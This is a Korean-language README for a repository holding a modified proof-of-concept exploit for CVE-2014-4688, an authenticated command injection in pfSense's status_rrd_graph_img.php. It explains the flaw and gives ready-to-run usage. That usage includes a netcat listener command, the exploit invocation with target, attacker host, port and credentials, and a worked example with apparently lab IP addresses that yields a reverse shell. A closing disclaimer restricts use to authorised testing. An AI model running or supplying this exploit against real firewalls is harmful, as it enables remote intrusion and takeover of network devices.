
pfSense status_rrd_graph_img.php의 명령 주입 취약점인 CVE-2014-4688용 수정된 개념 증명 익스플로잇으로, SSL 처리를 통해 인증된 원격 코드 실행을 가능하게 합니다.
CVE-2014-4688(pfSense status_rrd_graph_img.php 명령 주입)용 수정된 Exploit-DB 개념 증명
이 저장소는 pfSense 버전 ≤ 2.1.3에 영향을 미치는 CVE-2014-4688용 원본 Exploit-DB 개념 증명의 수정 버전을 포함합니다.
이 취약점은 status_rrd_graph_img.php 구성 요소에 존재하며, database 매개변수의 부적절한 입력값 검증으로 인해 인증된 사용자가 임의의 시스템 명령을 실행할 수 있게 합니다.
status_rrd_graph_img.php인증된 사용자는 취약한 엔드포인트에 제공된 조작된 입력을 통해 임의의 셸 명령을 주입할 수 있습니다.
리스너 시작:
nc -lvnp <LPORT>
개념 증명:
python3 cve-2014-4688.py --rhost <TARGET_IP> --lhost <ATTACKER_IP> --lport <PORT> --username <USERNAME> --password <PASSWORD>
python3 cve-2014-4688.py --rhost 10.129.7.193 --lhost 10.10.15.12 --lport 443 --username Joebloggs --password Password
이 저장소는 공인된 보안 연구, 교육 및 통제된 테스트 목적으로만 제공됩니다. 명시적 허가 없이 시스템에 대해 무단으로 사용하는 것은 불법이며 비윤리적입니다.